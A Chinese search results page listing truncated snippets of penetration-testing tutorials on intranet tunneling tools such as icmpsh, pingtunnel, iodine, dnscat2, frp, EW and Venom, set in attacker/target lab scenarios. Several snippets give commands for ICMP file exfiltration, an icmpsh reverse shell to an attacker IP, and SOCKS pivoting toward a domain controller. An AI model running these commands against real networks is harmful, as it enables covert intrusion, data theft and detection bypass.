首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏全栈程序员必看

    内网穿透 隧道_ping隧道

    目录 前言 一、概述 1、简介 2、原理 3、使用 (1)服务端 (2)客户端 二、实践 1、场景 2、建立隧道 (1)攻击机监听 (2)目标机发送 (3)攻击机转换 3、抓包看看 源码与分析 (1)icmp_tran.py (2)tran.sh 2、检测与绕过 (1)异常ICMP数据包数量 (2)异常ICMP包长度 (3)payload内容 结语 前言 本文研究ICMP隧道的一个工具 :内网渗透系列:内网隧道之ICMP隧道 3、使用 (1)服务端 tucpdump监听并下载文件 sudo tcpdump -i eth0 icmp and icmp[icmptype]=icmp-echo attacker-IP> 二、实践 1、场景 攻击机(服务端):kali 192.168.10.128 目标机(客户端):ubuntu 192.168.10.129 目标机可以ping通攻击机 2、建立隧道 tcpdump -i eth0 icmp and icmp[icmptype]=icmp-echo -XX -vvv -w output.txt (2)目标机发送 准备一个test.zip文件 建立隧道发送

    1.7K20编辑于 2022-11-02
  • 来自专栏网络安全攻防

    内网隧道之ICMP隧道

    ,可以跨平台使用,为了避免隧道被滥用,可以为隧道设置密码。 Web服务的机器,该机器可以通内网,同时向公网提供服务,内网存在一台Windows 7机器,Web服务器可以与该机器连接。 测试目标:假定现在我们获取到了边界Web服务器的权限,之后想用ICMP搭建通往内网隧道,连接内网Windows Server 2008 R2的3389端口 测试步骤: 在内网Web边界服务器执行以下指令 ,以Web服务器182.168.188.134为ICMP隧道跳板进行传送 相关参数说明: -p:指定ICMP隧道另一端的IP -lp:指定本地监听的端口 -da:指定要转发的目标机器的IP -dp 终端显示如下: 当我们想要使用ICMP隧道内网主机的22端口时,直接修改命令即可,例如: .

    3.2K12编辑于 2022-09-07
  • 来自专栏FreeBuf

    内网隐藏通信隧道技术——EW隧道

    内网隐藏通信隧道技术——EW隧道 EarthWorm中的应用 在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。 该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,现在使用人数较多,如果在真实环境下使用,需要免杀 下载地址:https://github.com/idlefire/ew 正向SOCKS v5服务器 以下命令使用目标为其拥有一个外网IP地址的情况: 在内网web服务器与外网代理机器之间架设隧道,访问域控 ew_for_Win.exe -s ssocksd -l 9999 代理成功 二级网络环境(b) A:无公网IP,可以访问外网,无法访问内网资源 内网web服务器 B:只能访问内网资源,无法访问外网 域控 在代理机器,内网域控,内网web服务器上进行模拟: 先在代理机器上执行 : ew -s lcx_listen -l 1080 -e 888 即在公网代理机器中添加转接隧道,将1080端口收到的代理请求转发给888端口 B主机执行,利用socksd方式启动999端口的SOCKS

    2.4K50发布于 2021-08-24
  • 来自专栏释然IT杂谈

    内网隐藏通信隧道技术——FRP隧道

    web服务器:192.168.27.170 10.10.3.100」 「域控:10.10.3.6 10.10.21.5」 内网隐藏通信隧道技术——FRP隧道 域控不能直接连接外网vps,可以连接内网 首先在外网vps上启动frps服务,在内网的web服务器与域控之间建立一条frps隧道内网web服务器启动frps,域控启动frpc服务,相互连接,建立起一条一级代理隧道,此时web服务器就作为跳板了 vps,可以连接内网域控,内网域控不能直接连接vps,可以连接内网web服务器,内网web服务器可以直接连接外网vps,所以通过内网web服务器作为跳板,将socks代理建设在内网域控中后,将打通隧道进行横向攻击核心区机器 利用处于内网或防火墙后的机器,对外网环境提供TCP和UDP服务,例如在家里通过SSH访问处于公司内网环境的主机 对于其它穿透隧道工具的不足: Earthworm不能过杀软,秒杀 Tunnel非常不稳定, web都动不动就崩溃,更别说支持3389 ptunnel环境在内网多限制情况不可利用,局限性大 DNS隧道穿透,适合僵尸网络

    4.6K10编辑于 2022-10-27
  • 来自专栏小生观察室

    内网渗透之内网隧道构建

    image.png 视频内容 内网渗透之内网隧道构建 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。

    1.5K30发布于 2021-03-05
  • 来自专栏kayden

    内网隧道之spp

    ---- 内网隧道之spp 前言 本文研究支持多协议双向代理的一个工具,spp github:https://github.com/esrrhs/spp 一、概述 1、简介 2020年新鲜出炉,持续更新 reverse_proxy_client -server 192.168.10.128:8888 -fromaddr :2222 -toaddr :80 -proxyproto tcp 可以开启80端口的Apache看看 (3)隧道建立 test" -type reverse_socks5_client -server 192.168.10.128 -fromaddr :1080 -proxyproto tcp -proto (3)建立隧道

    1.6K10编辑于 2022-09-29
  • 来自专栏kayden

    内网隧道之iox

    ---- 内网隧道之iox 前言 本文研究端口转发 & SOCKS代理工具的一个工具,iox github:https://github.com/EddieIvan01/iox 一、概述 1、简介 最后更新于 /iox proxy -l 9999 -l 1080 #注意,这两个端口是有顺序的 #接着连接内网主机 proxychains.conf socks5://1.1.1.1:1080 $ proxychains /iox fwd -r 127.0.0.1:80 -r *192.168.10.128:2222 -k 123456 (3)隧道建立 还可以nc、ssh等,根据端口来确定服务 (4)抓包看看 /iox proxy -r 192.168.10.128:2222 (3)隧道建立 之后通过proxychains可以执行命令 如nmap扫描端口信息 proxychains4 nmap -p 1-1000

    5.3K20编辑于 2022-09-29
  • 来自专栏kayden

    内网隧道之iodine

    ---- 内网隧道之iodine 前言 本文研究DNS隧道的一个经典工具,iodine github:https://github.com/yarrick/iodine 一、概述 1、简介 持续更新, (2)客户端 linux环境: iodine -f -P <password> vpn.abc.ltd -M 200 -r:iodine有时会自动将DNS隧道切换为UDP隧道,该参数的作用是强制在任何情况下使用 DNS隧道 -M:指定上行主机的大小。 10.0.0.1 (2)客户端 建立隧道前状态 建立隧道 iodine -f -r -P 123456 dnstunnel.test.com 也是多了个网卡dns0,ip为10.0.0.2 (3)ssh 此时隧道建立成功,在服务端会打印出心跳包 尝试ssh 隧道成功建立,流量可代理 此时,打印出的包如下: 3、抓包看看 建立隧道,域名让人没眼看 虚拟网卡中

    1.5K10编辑于 2022-09-29
  • 来自专栏kayden

    内网隧道之frp

    ---- 内网隧道之frp 前言 本文研究通过TCP和HTTP出网的一个工具,frp github:https://github.com/fatedier/frp 一、概述 1、简介 写于2015年,持续更新 frpc.ini配置文件中的端口号 二、实践 1、测试场景 攻击机(服务端):kali 192.168.10.128 目标机(客户端):ubuntu 192.168.10.129 都没有限制TCP连接 2、建立隧道 /frpc.ini (3)隧道建立 类似地,可以根据服务来确定端口 3、抓包看看 三次握手建立连接 调用服务期间 三、探索 1、源码与分析 frp 的程序代码为了糅合 frpc

    1K20编辑于 2022-09-29
  • 来自专栏kayden

    内网隧道之Venom

    ---- 内网隧道之Venom 前言 本文研究端口转发&SOCKS5&SSH的一个工具,Venom github:https://github.com/Dliv3/Venom/ 一、概述 1、简介 玄武实验室的 ,用Go编写,多级代理工具,功能极强,但是现在基本被各大杀软查杀了(需做好免杀) 多级socks5代理 多级端口转发 端口复用 (apache/mysql/…) ssh隧道 /agent_macos_x64 -rhost 192.168.0.103 -rport 8889 -passwd dlive@dubhe (4)三层代理 可参考 内网代理神器Venom及三层代理演示 内网穿透工具—Venom使用教程 二、实践 1、测试场景 攻击机(服务端):kali 192.168.10.128 目标机(客户端):ubuntu 192.168.10.129 都没有限制TCP 连接 2、建立隧道 (1)服务端 .

    1.1K21编辑于 2022-09-29
  • 来自专栏kayden

    内网隧道之NATBypass

    ---- 内网隧道之NATBypass 前言 本文研究端口转发的一个工具,NATBypass github:https://github.com/cw1997/NATBypass 一、概述 1、简介 最后更新于 命令将转发数据实时显示出来 二、实践 1、测试场景 攻击机(服务端):kali 192.168.10.128 目标机(客户端):ubuntu 192.168.10.129 都没有限制TCP连接 2、建立隧道

    60210编辑于 2022-09-29
  • 来自专栏kayden

    内网隧道之icmpsh

    ---- 内网隧道之icmpsh 前言 本文研究ICMP隧道的一个工具,icmpsh github:https://github.com/bdamele/icmpsh 一、概述 1、简介 最后更新于2013 条件: 目标机可以ping出来 目标机是windows 2、原理 ICMP隧道原理参见:内网渗透系列:内网隧道之ICMP隧道 客户端开启cmd进程,通过pipe放入icmp隧道进程,将命令和回显放进 python icmpsh_m.py <attacker's-IP> <target-IP> 客户端(目标机,win)执行 icmpsh.exe -t <attacker's-IP> 然后就建立了隧道 二、实践 1、场景 攻击机:kali 192.168.227.129 目标机:windows7 192.168.227.128 目标机能ping通攻击机 2、建立隧道 (1)攻击机 关闭内核对ping (2)目标机 建立隧道 icmpsh.exe -t 192.168.227.129 (3)隧道建立成功 成功建立隧道并反弹shell 可以发现对中文名不友好 3、抓包看看 连接上迅速反弹shell

    67920编辑于 2022-09-29
  • 来自专栏kayden

    内网隧道之nps

    ---- 内网隧道之nps 前言 本文研究支持多种代理的一个工具,nps github:https://github.com/ehang-io/nps 一、概述 1、简介 写于2018年,持续更新,用Go 也可以设置配置文件,那功能就多了,参见官网 二、实践 1、测试场景 攻击机(服务端):kali 192.168.10.128 目标机(客户端):ubuntu 192.168.10.129 2、建立隧道 /nps install 启动 nps start 登录(看这个界面就给跪了,太强了) 设置一个客户端 点击上图的隧道 (2)客户端 启动 . /npc -server=192.168.10.128:8024 -vkey=nfzp2xp2n742ge3h -type=tcp (3)隧道建立 显示连接 可以通过proxychains来代理流量到上面设置的

    1.4K10编辑于 2022-09-29
  • 来自专栏kayden

    内网隧道之pingtunnel

    ---- 内网隧道之pingtunnel 前言 本文研究ICMP隧道的一个工具,pingtunnel github:https://github.com/esrrhs/pingtunnel 一、概述 1 sock5 流量伪装成 icmp 流量进行转发的工具,跨平台 条件: 目标机(客户端)可以ping出去 目标机可能要管理员权限 windows要装有wincap 2、原理 ICMP隧道原理参见 :内网渗透系列:内网隧道之ICMP隧道 3、使用 (1)直连出网 攻击机(服务端)启动隧道并关闭系统默认的 ping sudo . /pingtunnel -p <跳板机ip> -lp 1080 -da <目标机ip> -dp 3389 -x 123456 -p 指定ICMP隧道另一端的IP -lp:指定本地监听的端口 结语 用go写的icmp隧道,比其他icmp隧道要牛一点 ---- 红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。

    2.2K20编辑于 2022-09-29
  • 来自专栏乌鸦安全

    内网隧道搭建总结(一)

    内网代理 内网代理分为以下两个部分: 正向代理:已控服务器监听端口,通过这个端口形成一个正向的隧道,由代理机器代替主机去访问内网目标。 但是内网入口一般处于DMZ区域有防火墙拦截,无法直接进入内网环境。 反向代理:由内网主机主动交出权限到代理机器,然后本地去连接形成反向代理。 例如:VPS监听本地端口,已控内网服务器来连接此端口,形成一个隧道。如果内网设备连接外网,就无法回弹只能再想其他办法。 3. 转发 端口转发 端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为,拿到公网shell和内网shell之后,无法直接接入目标内网,需要进行端口转发将内网的端口转发到我们的网络环境可以接入的跳板机上面从而进行连接 ,常见的端口转发方式有很多,例如lcx工具转发,nc反弹,socket代理, ssh隧道代理转发等等,这里暂时只对LCX工具进行介绍,其他方式后续陆续讲解。

    2.4K10发布于 2021-10-26
  • 来自专栏潇湘信安

    内网隧道工具SPP尝鲜

    支持icmp、kcp、quic 支持双向的代理 可以自由进行内部外协议的组合 通过一个工具基本可以满足演练过程中打隧道的要求(可惜不支持dns协议)。 8080 -proxyproto tcp 挂代理 socks5:vps:8080,查询当前ip为client,已进入client网络环境 内外部协议封装 该功能支持各种协议的嵌套使用,可使用于各种内网极端环境 在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。 proto ricmp 挂代理socks5:vps:8080,查看当前ip为client出口地址,已进入client网络环境 ICMP+cobaltstrike Server 反向代理用于进入目标内网

    2K41发布于 2021-07-28
  • 来自专栏谢公子学安全

    内网转发及隐蔽隧道 | 网络层隧道技术之ICMP隧道(pingTunnelIcmpTunnel)

    网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel) 目录 ICMP隧道 使用ICMP搭建隧道(PingTunnel) 使用ICMP搭建隧道 使用ICMP搭建隧道(PingTunnel) PingTunnel是一款常用的ICMP隧道工具,可以跨平台使用,为了避免隧道被滥用,还可以为隧道设置密码。 拓扑图如下: 192.168.10.X 模拟公网地址,Web服务器模拟企业对外提供Web服务的机器,该机器可以通内网,同时向公网提供服务。内网存在一台WIndows机器,Web服务器可以与该机器连接。 现在我们获取到了Web服务器的权限,想用ICMP搭建通往内网隧道,连接内网Windows的3389端口。 虽然ICMP echo流量在网络边界通常会被过滤,但这种方法仍然可能对从企业内网出连到互联网的技术有一定帮助。

    4.1K12编辑于 2022-01-19
  • 来自专栏kayden

    内网渗透系列:内网隧道之icmp_tran

    ---- 内网渗透系列:内网隧道之icmp_tran 前言 本文研究ICMP隧道的一个工具,icmp_tran github:github.com/NotSoSecure/icmp_tunnel_ex_filtrate 一、概述 1、简介 最后更新于2015年,用Python编写,将文件base64编码后,通过ICMP包传输 条件: 目标机可以ping出去 目标机管理员权限 2、原理 ICMP隧道原理参见 :内网渗透系列:内网隧道之ICMP隧道 3、使用 (1)服务端 tucpdump监听并下载文件 sudo tcpdump -i eth0 icmp and icmp[icmptype]=icmp-echo attacker-IP> 二、实践 1、场景 攻击机(服务端):kali 192.168.10.128 目标机(客户端):ubuntu 192.168.10.129 目标机可以ping通攻击机 2、建立隧道 监听并下载文件 sudo tcpdump -i eth0 icmp and icmp[icmptype]=icmp-echo -XX -vvv -w o (2)目标机发送 准备一个test.zip文件 建立隧道发送

    51310编辑于 2022-09-29
  • 来自专栏kayden

    ​​内网隧道之Neo-reGeorg

    ---- 内网隧道之Neo-reGeorg 前言 本文研究HTTP隧道的一个工具,Neo-reGeorg github:https://github.com/L-codes/Neo-reGeorg 一 > -t <ip:port> 二、实践 1、测试场景 攻击机(服务端):kali 192.168.10.128 目标机(客户端):ubuntu 192.168.10.129 开放web服务 2、建立隧道

    2.8K20编辑于 2022-09-29
  • 来自专栏kayden

    内网隧道之dnscat2

    ---- 内网隧道之dnscat2 前言 本文研究DNS隧道的一个工具,dnscat2 github:https://github.com/iagox86/dnscat2 一、概述 1、简介 最后更新于 服务器是用 ruby 编写 IP over DNS,通过 DNS 协议创建加密的命令和控制 (C&C) 通道,直接运行工具即可实现数据传输、文件操作等命令和控制功能 利用合法DNS服务器实现DNS隧道 运行模式如大多DNS隧道工具一样:Dnscat2客户端->DNS服务商->Dnscat2服务端。 如果没有购买域名,还可以在UDP/53上使用直连。 secret=123456 abc.com dnscat --dns server=<your dnscat2 server ip>,port=553 --secret=123456 (3)使用隧道 可以获取,这里展示一个shell 3、抓包看看 建立隧道 心跳包,CNAME、TXT、MX混用,但是域名是异常域名 三、探索 1、源码与分析 TODO 2、检测与绕过 (1)特征字符串

    1.5K10编辑于 2022-09-29
领券